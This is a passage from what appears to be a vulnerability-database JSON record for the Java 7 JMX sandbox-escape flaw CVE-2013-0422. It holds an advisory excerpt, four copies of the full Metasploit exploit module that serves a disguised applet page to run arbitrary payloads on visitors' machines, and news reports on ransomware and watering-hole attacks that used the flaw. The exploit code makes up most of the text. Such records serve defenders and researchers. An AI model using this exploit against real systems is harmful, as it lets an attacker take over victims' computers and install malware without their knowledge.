As a result, two new security vulnerabilities (51\r\nand 52) were spotted in a recent version of Java SE 7 code and\r\nthey were reported to Oracle today [4] (along with a working\r\nProof of Concept code).\r\n\r\nThank you.\r\n\r\nBest Regards\r\nAdam Gowdiak\r\n\r\n---------------------------------------------\r\nSecurity Explorations\r\nhttp://www.security-explorations.com\r\n"We bring security research to the new level"\r\n---------------------------------------------\r\n\r\nReferences:\r\nReferences:\r\n[1] Oracle Security Alert for CVE-2013-0422\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\r\n[2] Java 7 Update 11 Addresses the Flaw Partly Fixed in October 2012, Experts Say\r\n\r\nhttp://news.softpedia.com/news/Java-7-Update-11-Addresses-the-Flaw-Partly-Fixed-in-October-2012-Experts-Say-320792.shtml\r\n[3] Confirmed: Java only fixed one of the two bugs\r\n\r\nhttp://immunityproducts.blogspot.com.ar/2013/01/confirmed-java-only-fixed-one-of-two.html\r\n[4] SE-2012-01 Vendors status\r\n http://www.security-explorations.com/en/SE-2012-01-status.html\r\n\r\n", "edition": 1, "modified": "2013-01-21T00:00:00", "published": "2013-01-21T00:00:00", "id": "SECURITYVULNS:DOC:28971", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28971", "title": "[SE-2012-01] Java 7 Update 11 confirmed to be vulnerable", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T22:23:33", "description": "Java Applet JMX Remote Code Execution. CVE-2013-0422. 
Remote exploit for java platform", "published": "2013-01-11T00:00:00", "type": "exploitdb", "title": "Java Applet JMX Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "modified": "2013-01-11T00:00:00", "id": "EDB-ID:24045", "href": "https://www.exploit-db.com/exploits/24045/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({ :javascript => false })\r\n\r\n\tdef initialize( info = {} )\r\n\r\n\t\tsuper( update_info( info,\r\n\t\t\t'Name' => 'Java Applet JMX Remote Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module abuses the JMX classes from a Java Applet to run arbitrary Java\r\n\t\t\t\tcode outside of the sandbox as exploited in the wild in January of 2013. The\r\n\t\t\t\tvulnerability affects Java version 7u10 and earlier.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # Vulnerability discovery\r\n\t\t\t\t\t'egypt', # Metasploit module\r\n\t\t\t\t\t'sinn3r', # Metasploit module\r\n\t\t\t\t\t'juan vazquez' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2013-0422' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '625617' ],\r\n\t\t\t\t\t[ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],\r\n\t\t\t\t\t[ 'URL', 'http://pastebin.com/cUG2ayjh' ] #Who authored the code on pastebin? 
I can't read Russian :-(\r\n\t\t\t\t],\r\n\t\t\t'Platform' => [ 'java', 'win', 'osx', 'linux' ],\r\n\t\t\t'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Generic (Java Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => ['java'],\r\n\t\t\t\t\t\t\t'Arch' => ARCH_JAVA,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Windows x86 (Native Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Mac OS X x86 (Native Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 (Native Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jan 10 2013'\r\n\t\t))\r\n\tend\r\n\r\n\r\n\tdef setup\r\n\t\tpath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"cve-2013-0422\", \"Exploit.class\")\r\n\t\t@exploit_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\r\n\t\tpath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"cve-2013-0422\", \"B.class\")\r\n\t\t@loader_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\r\n\r\n\t\t@exploit_class_name = rand_text_alpha(\"Exploit\".length)\r\n\t\t@exploit_class.gsub!(\"Exploit\", @exploit_class_name)\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\tprint_status(\"handling request for #{request.uri}\")\r\n\r\n\t\tcase request.uri\r\n\t\twhen /\\.jar$/i\r\n\t\t\tjar = payload.encoded_jar\r\n\t\t\tjar.add_file(\"#{@exploit_class_name}.class\", @exploit_class)\r\n\t\t\tjar.add_file(\"B.class\", @loader_class)\r\n\t\t\tmetasploit_str = rand_text_alpha(\"metasploit\".length)\r\n\t\t\tpayload_str = 
rand_text_alpha(\"payload\".length)\r\n\t\t\tjar.entries.each { |entry|\r\n\t\t\t\tentry.name.gsub!(\"metasploit\", metasploit_str)\r\n\t\t\t\tentry.name.gsub!(\"Payload\", payload_str)\r\n\t\t\t\tentry.data = entry.data.gsub(\"metasploit\", metasploit_str)\r\n\t\t\t\tentry.data = entry.data.gsub(\"Payload\", payload_str)\r\n\t\t\t}\r\n\t\t\tjar.build_manifest\r\n\r\n\t\t\tsend_response(cli, jar, { 'Content-Type' => \"application/octet-stream\" })\r\n\t\twhen /\\/$/\r\n\t\t\tpayload = regenerate_payload(cli)\r\n\t\t\tif not payload\r\n\t\t\t\tprint_error(\"Failed to generate the payload.\")\r\n\t\t\t\tsend_not_found(cli)\r\n\t\t\t\treturn\r\n\t\t\tend\r\n\t\t\tsend_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })\r\n\t\telse\r\n\t\t\tsend_redirect(cli, get_resource() + '/', '')\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef generate_html\r\n\t\thtml = %Q|<html><head><title>Loading, Please Wait...</title></head>|\r\n\t\thtml += %Q|<body><center><p>Loading, Please Wait...</p></center>|\r\n\t\thtml += %Q|<applet archive=\"#{rand_text_alpha(8)}.jar\" code=\"#{@exploit_class_name}.class\" width=\"1\" height=\"1\">|\r\n\t\thtml += %Q|</applet></body></html>|\r\n\t\treturn html\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24045/"}], "metasploit": [{"lastseen": "2020-10-12T23:19:28", "description": "This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in January of 2013. 
The vulnerability affects Java version 7u10 and earlier.\n", "published": "2013-01-10T19:30:43", "type": "metasploit", "title": "Java Applet JMX Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/BROWSER/JAVA_JRE17_JMXBEAN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({ :javascript => false })\n\n def initialize( info = {} )\n\n super( update_info( info,\n 'Name' => 'Java Applet JMX Remote Code Execution',\n 'Description' => %q{\n This module abuses the JMX classes from a Java Applet to run arbitrary Java\n code outside of the sandbox as exploited in the wild in January of 2013. The\n vulnerability affects Java version 7u10 and earlier.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery\n 'egypt', # Metasploit module\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-0422' ],\n [ 'OSVDB', '89059' ],\n [ 'US-CERT-VU', '625617' ],\n [ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],\n [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],\n [ 'URL', 'http://pastebin.com/cUG2ayjh' ] #Who authored the code on pastebin? 
I can't read Russian :-(\n ],\n 'Platform' => %w{ java linux osx win },\n 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\n 'Targets' =>\n [\n [ 'Generic (Java Payload)',\n {\n 'Platform' => ['java'],\n 'Arch' => ARCH_JAVA,\n }\n ],\n [ 'Windows x86 (Native Payload)',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Mac OS X x86 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Linux x86 (Native Payload)',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2013-01-10'\n ))\n end\n\n\n def setup\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-0422\", \"Exploit.class\")\n @exploit_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-0422\", \"B.class\")\n @loader_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n\n @exploit_class_name = rand_text_alpha(\"Exploit\".length)\n @exploit_class.gsub!(\"Exploit\", @exploit_class_name)\n super\n end\n\n def on_request_uri(cli, request)\n print_status(\"handling request for #{request.uri}\")\n\n case request.uri\n when /\\.jar$/i\n jar = payload.encoded_jar\n jar.add_file(\"#{@exploit_class_name}.class\", @exploit_class)\n jar.add_file(\"B.class\", @loader_class)\n metasploit_str = rand_text_alpha(\"metasploit\".length)\n payload_str = rand_text_alpha(\"payload\".length)\n jar.entries.each { |entry|\n entry.name.gsub!(\"metasploit\", metasploit_str)\n entry.name.gsub!(\"Payload\", payload_str)\n entry.data = entry.data.gsub(\"metasploit\", metasploit_str)\n entry.data = entry.data.gsub(\"Payload\", payload_str)\n }\n jar.build_manifest\n\n send_response(cli, jar, { 'Content-Type' => \"application/octet-stream\" })\n when /\\/$/\n payload = regenerate_payload(cli)\n if not payload\n print_error(\"Failed to generate the payload.\")\n send_not_found(cli)\n return\n end\n 
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })\n else\n send_redirect(cli, get_resource() + '/', '')\n end\n\n end\n\n def generate_html\n html = %Q|<html><head><title>Loading, Please Wait...</title></head>|\n html += %Q|<body><center><p>Loading, Please Wait...</p></center>|\n html += %Q|<applet archive=\"#{rand_text_alpha(8)}.jar\" code=\"#{@exploit_class_name}.class\" width=\"1\" height=\"1\">|\n html += %Q|</applet></body></html>|\n return html\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/java_jre17_jmxbean.rb"}], "thn": [{"lastseen": "2017-01-08T18:01:26", "bulletinFamily": "info", "cvelist": ["CVE-2013-0422"], "description": "[](<http://2.bp.blogspot.com/-hmHfgVixQNI/UPbcy1J22jI/AAAAAAAAR4M/oWTQ6wJAx4E/s1600/Oracle+Patches+Java+Zero+Day+Vulnerability.jpg>)\n\nOracle delivered an unusual emergency patch to Java's critical Zero Day vulnerability on Sunday to fix a malicious bug that allowed hackers access to users web browsers. Exploits for the [previously undisclosed flaw were](<http://thehackernews.com/2013/01/exploit-packs-updated-with-new-java.html>) being hosted in a number of [exploit kits](<http://thehackernews.com/2012/09/blackhole-exploit-kit-20-released-with.html>) and attacks have already been seen in the wild dropping ransomware and assorted other malware.\n\n \n\n\nSecurity Alert [CVE-2013-0422](<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>) include two [vulnerabilities](<http://thehackernews.com/2012/12/hunting-vulnerabilities-in-scada.html>) that are remotely executable. Oracle confirmed that the flaws were only present in Java 7 versions and did not impact Java on servers, Java desktop applications, or embedded Java.\n\n \n \n\n\nJava is used in 3 billion machines, about 2 billion of which are desktop or laptop computers. 
Similarly, back in August last year, Oracle issued an urgent fix to seal a dangerous security flaw within its Java software that\u2019s left thousands of computers wide open to malicious attacks from hackers.\n\n \n\n\n**_Lamar Bailey_**, director of security research and development for [nCircle](<https://www.ncircle.com/>) said, \u201c_We\u2019re just two weeks into 2013 and already we\u2019ve seen a surge of critical vulnerabilities and emergency patches. Oracle just added 86 new fixes to overloaded IT teams already struggling to keep up with emergency patches for Java, Internet Explorer and Ruby on Rails._ \n_ \n_ _No matter how far behind IT teams are, they can\u2019t afford to ignore this massive Oracle patch. Oracle Mobile Server has two CVEs that have a CVSS score of ten, that\u2019s as bad as it gets. There are also two MySQL vulnerabilities that can be exploited remotely. All of these should be patched as soon as possible_.\u201d \n \nThe January patch includes 86 security updates across all major product lines including [Oracle Database](<http://thehackernews.com/2012/05/oracle-database-new-zero-day-exploit.html>) and MySQL Server. 
Patches for a number of Oracle applications were released Tuesday, including nine for Oracle E-Business Suite (7 of which are remotely exploitable), 12 in Oracle PeopleSoft (7 remotely exploitable), 10 in Oracle Siebel CRM (5 remotely exploitable), and one each in Oracle Supply Chain Products Suite and Oracle JD Edwards Products.\n", "modified": "2013-01-16T17:01:53", "published": "2013-01-16T06:01:00", "id": "THN:B322DFBE39D6B1984ECCA4237D6EB6EB", "href": "http://thehackernews.com/2013/01/oracle-patches-java-zero-day.html", "type": "thn", "title": "Oracle Patches Java Zero Day Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:42", "bulletinFamily": "info", "cvelist": ["CVE-2013-0422"], "description": "[](<https://3.bp.blogspot.com/-goylQ_crASs/UuoeOzUewsI/AAAAAAAAASk/xLNzzDSmUHQ/s1600/ICEPOL+Reveton+Ransomware+Trojan.jpg>)\n\nAfter Financial and Banking Malwares, Ransomware has become the first choice of money motivated cybercriminals.\n\n \n\n\nA new Ransomware Trojan known as **ICEPOL** has been one of those widespread malware which has been successfully installed approximately 267,786 times worldwide and 42,400 in the USA alone over a five month period, analyzed by the security firm [_BitDefender_](<http://www.presseportal.de/pm/52715/2651614/gemeinsame-aktion-mit-der-rumaenischen-polizei-bitdefender-hat-icepol-trojaner-untersucht>).\n\n \n\n\nThe** **ICEPOL Trojan** **categorized as Ransomware that locks your PC and demand for a ransom amount to unlock it. The Malware was using a previously known vulnerability in Java software i.e. 
[_CVE-2013-0422_](<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>) to infect the systems.\n\n \n\n\nThe malware threatened the user with accusations of illegal piracy or '_porn-related activity_' and requires money for exemption from punishment that pretends to be from the 'police'.\n\n \n\n\n\u201c_The ICEPOL Trojan extorted victims who downloaded it by sending them a message in any one of 25 languages purporting to be from police accusing them of downloading copyrighted material or illegal porn_,\u201d said Catalin Cosoi, Chief Security Strategist from Bitdefender.\n\n \n\n\nThe [malware](<https://thehackernews.com/search/label/Malware>) includes one more money making scheme, i.e. Designed to redirect the victims to the website via _pay-per-click_ scam under the traffic exchange mechanism. The police estimated that more than $32,000 was stolen from the U.S. victims over the five-month period.\n\n \n\n\nThe Romanian police in cooperation with the Internet security firm Bitdefender found dozens of C&C servers and successfully seized one of the major C&C servers, which was the part of large distribution of ICEPOL Trojans, located in the Romanian capital Bucharest.\n\n \n\n\n\u201c_The results of the investigation of ICEPOL Trojan based on cooperation with various law enforcement agencies and third party vendors. Despite the complex investigations, we have so far achieved very good results and we will continue to fight cybercrime_\", says the head of the agency against cyber crime, the Romanian National Police.\n\n \n\n\nThis is not the first time when a ransomware tricked the victims successfully, also last year [cryptolocker](<https://thehackernews.com/search/label/CryptoLocker>) of the same category hits millions of computer users. So, users are advised to keep their systems software and anti-virus solutions up-to-date and most importantly patch your Java distribution immediately to _Update 51_.\n\n \n\n\nStay Safe! 
Stay Tuned!\n", "modified": "2014-01-31T06:55:09", "published": "2014-01-29T22:48:00", "id": "THN:4EAA4FEF21F8E68A90003CC58D6639E2", "href": "https://thehackernews.com/2014/01/icepol-ransomware-servers-seized-by.html", "type": "thn", "title": "ICEPOL Ransomware Servers seized by Romanian Police that infected 260,000 Computers", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:05", "description": "", "published": "2013-01-11T00:00:00", "type": "packetstorm", "title": "Java Applet JMX Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "modified": "2013-01-11T00:00:00", "id": "PACKETSTORM:119472", "href": "https://packetstormsecurity.com/files/119472/Java-Applet-JMX-Remote-Code-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \nrequire 'rex' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::EXE \n \ninclude Msf::Exploit::Remote::BrowserAutopwn \nautopwn_info({ :javascript => false }) \n \ndef initialize( info = {} ) \n \nsuper( update_info( info, \n'Name' => 'Java Applet JMX Remote Code Execution', \n'Description' => %q{ \nThis module abuses the JMX classes from a Java Applet to run arbitrary Java \ncode outside of the sandbox as exploited in the wild in January of 2013. The \nvulnerability affects Java version 7u10 and earlier. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Unknown', # Vulnerability discovery \n'egypt', # Metasploit module \n'sinn3r', # Metasploit module \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2013-0422' ], \n[ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ], \n[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ] \n], \n'Platform' => [ 'java', 'win', 'osx', 'linux' ], \n'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, \n'Targets' => \n[ \n[ 'Generic (Java Payload)', \n{ \n'Platform' => ['java'], \n'Arch' => ARCH_JAVA, \n} \n], \n[ 'Windows x86 (Native Payload)', \n{ \n'Platform' => 'win', \n'Arch' => ARCH_X86, \n} \n], \n[ 'Mac OS X x86 (Native Payload)', \n{ \n'Platform' => 'osx', \n'Arch' => ARCH_X86, \n} \n], \n[ 'Linux x86 (Native Payload)', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_X86, \n} \n], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jan 10 2013' \n)) \nend \n \n \ndef setup \npath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"j7u10_jmx\", \"Exploit.class\") \n@exploit_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) } \npath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"j7u10_jmx\", \"B.class\") \n@loader_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) } \n \n@exploit_class_name = rand_text_alpha(\"Exploit\".length) \n@exploit_class.gsub!(\"Exploit\", @exploit_class_name) \nsuper \nend \n \ndef on_request_uri(cli, request) \nprint_status(\"handling request for #{request.uri}\") \n \ncase request.uri \nwhen /\\.jar$/i \njar = payload.encoded_jar \njar.add_file(\"#{@exploit_class_name}.class\", @exploit_class) \njar.add_file(\"B.class\", @loader_class) \nmetasploit_str = rand_text_alpha(\"metasploit\".length) \npayload_str = rand_text_alpha(\"payload\".length) \njar.entries.each { |entry| \nentry.name.gsub!(\"metasploit\", metasploit_str) 
\nentry.name.gsub!(\"Payload\", payload_str) \nentry.data = entry.data.gsub(\"metasploit\", metasploit_str) \nentry.data = entry.data.gsub(\"Payload\", payload_str) \n} \njar.build_manifest \n \nsend_response(cli, jar, { 'Content-Type' => \"application/octet-stream\" }) \nwhen /\\/$/ \npayload = regenerate_payload(cli) \nif not payload \nprint_error(\"Failed to generate the payload.\") \nsend_not_found(cli) \nreturn \nend \nsend_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) \nelse \nsend_redirect(cli, get_resource() + '/', '') \nend \n \nend \n \ndef generate_html \nhtml = %Q|<html><head><title>Loading, Please Wait...</title></head>| \nhtml += %Q|<body><center><p>Loading, Please Wait...</p></center>| \nhtml += %Q|<applet archive=\"#{rand_text_alpha(8)}.jar\" code=\"#{@exploit_class_name}.class\" width=\"1\" height=\"1\">| \nhtml += %Q|</applet></body></html>| \nreturn html \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/119472/java_jre17_jmxbean.rb.txt"}], "zdt": [{"lastseen": "2018-03-03T03:42:40", "edition": 2, "description": "This Metasploit module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in January of 2013. The vulnerability affects Java version 7u10 and earlier.", "published": "2013-01-11T00:00:00", "type": "zdt", "title": "Java Applet JMX Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "modified": "2013-01-11T00:00:00", "id": "1337DAY-ID-20155", "href": "https://0day.today/exploit/description/20155", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::EXE\r\n\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n autopwn_info({ :javascript => false })\r\n\r\n def initialize( info = {} )\r\n\r\n super( update_info( info,\r\n 'Name' => 'Java Applet JMX Remote Code Execution',\r\n 'Description' => %q{\r\n This module abuses the JMX classes from a Java Applet to run arbitrary Java\r\n code outside of the sandbox as exploited in the wild in January of 2013. The\r\n vulnerability affects Java version 7u10 and earlier.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Unknown', # Vulnerability discovery\r\n 'egypt', # Metasploit module\r\n 'sinn3r', # Metasploit module\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-0422' ],\r\n [ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],\r\n [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ]\r\n ],\r\n 'Platform' => [ 'java', 'win', 'osx', 'linux' ],\r\n 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\r\n 'Targets' =>\r\n [\r\n [ 'Generic (Java Payload)',\r\n {\r\n 'Platform' => ['java'],\r\n 'Arch' => ARCH_JAVA,\r\n }\r\n ],\r\n [ 'Windows x86 (Native Payload)',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n }\r\n ],\r\n [ 'Mac OS X x86 (Native Payload)',\r\n {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X86,\r\n }\r\n ],\r\n [ 'Linux x86 (Native Payload)',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jan 10 2013'\r\n ))\r\n end\r\n\r\n\r\n def setup\r\n path = File.join(Msf::Config.install_root, 
\"data\", \"exploits\", \"j7u10_jmx\", \"Exploit.class\")\r\n @exploit_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\r\n path = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"j7u10_jmx\", \"B.class\")\r\n @loader_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\r\n\r\n @exploit_class_name = rand_text_alpha(\"Exploit\".length)\r\n @exploit_class.gsub!(\"Exploit\", @exploit_class_name)\r\n super\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n print_status(\"handling request for #{request.uri}\")\r\n\r\n case request.uri\r\n when /\\.jar$/i\r\n jar = payload.encoded_jar\r\n jar.add_file(\"#{@exploit_class_name}.class\", @exploit_class)\r\n jar.add_file(\"B.class\", @loader_class)\r\n metasploit_str = rand_text_alpha(\"metasploit\".length)\r\n payload_str = rand_text_alpha(\"payload\".length)\r\n jar.entries.each { |entry|\r\n entry.name.gsub!(\"metasploit\", metasploit_str)\r\n entry.name.gsub!(\"Payload\", payload_str)\r\n entry.data = entry.data.gsub(\"metasploit\", metasploit_str)\r\n entry.data = entry.data.gsub(\"Payload\", payload_str)\r\n }\r\n jar.build_manifest\r\n\r\n send_response(cli, jar, { 'Content-Type' => \"application/octet-stream\" })\r\n when /\\/$/\r\n payload = regenerate_payload(cli)\r\n if not payload\r\n print_error(\"Failed to generate the payload.\")\r\n send_not_found(cli)\r\n return\r\n end\r\n send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })\r\n else\r\n send_redirect(cli, get_resource() + '/', '')\r\n end\r\n\r\n end\r\n\r\n def generate_html\r\n html = %Q|<html><head><title>Loading, Please Wait...</title></head>|\r\n html += %Q|<body><center><p>Loading, Please Wait...</p></center>|\r\n html += %Q|<applet archive=\"#{rand_text_alpha(8)}.jar\" code=\"#{@exploit_class_name}.class\" width=\"1\" height=\"1\">|\r\n html += %Q|</applet></body></html>|\r\n return html\r\n end\r\n\r\nend\n\n# 0day.today [2018-03-03] #", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20155"}], "fireeye": [{"lastseen": "2017-12-14T08:34:59", "bulletinFamily": "info", "cvelist": ["CVE-2011-3544", "CVE-2013-1288", "CVE-2013-0422"], "description": "On March 16th, we discovered a premeditated waterhole campaign that hosts exploits and malware on websites frequented by a specific target group. In this case the target includes Chinese dissidents. For the attacker, this approach is highly attractive since it is very difficult to discover the attacker\u2019s identity. Moreover, this attack is a form of social engineering, leveraging the fact that the target group visits specific websites. By exploiting these \u201cwatering holes\u201d the attacker benefits by investing little time in targeting.\n\nThis attack exploits a fresh vulnerability ([CVE-2013-1288](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1288>), [MS13-021](<http://technet.microsoft.com/en-us/security/bulletin/MS13-021>)) in Internet Explorer 8\u2014just four days after Microsoft released a patch. Why did attackers use a fresh vulnerability? Cost could be a factor. Zero-days tend to be expensive to either research or purchase on black markets.\n\nWe found this exploit being employed in attacks on two hacked Chinese news websites known to promote dissidence against the Chinese government. This is clearly a targeted attack on a very narrow portion of the Chinese populous. However, since cyber attackers are quick copycats, we expect this exploit to be replicated quickly. For this reason, anyone using IE 8 must install a patch immediately or upgrade their browser to new versions. Today, according to [W3Schools.com](<http://www.w3schools.com/browsers/browsers_explorer.asp>), IE is the third most popular browser with about 15% market share. 
In addition, IE 8 is used by half of all IE users.\n\nBased on the similarity in TTPs (Tools, Techniques, and Procedures), we believe the threat actor is the same as the one behind previous watering hole attacks targeting activists and people with certain political affiliations. In the past this campaign has used various hacked websites such as the Council on Foreign Relations or CFR, [Reporters Without Borders](<https://blog.avast.com:2013:01:22:reporters-without-borders-website-misused-in-wateringhole-attack:>), and a leading American university (that we cannot name).\n\nIn general, based on our observations, this watering hole attack is like many others we have observed: highly targeted and hard to trace\u2014indicative of a very sophisticated attacker. Why? The attack:\n\n * Used hacked websites to deliver the exploit to targeted groups of people. In this case it particularly targets certain group of Chinese speaking people.\n * Used hacked website to host exploit code and malware payload, and also second stage of payload, which makes it very hard to trace the origin of the 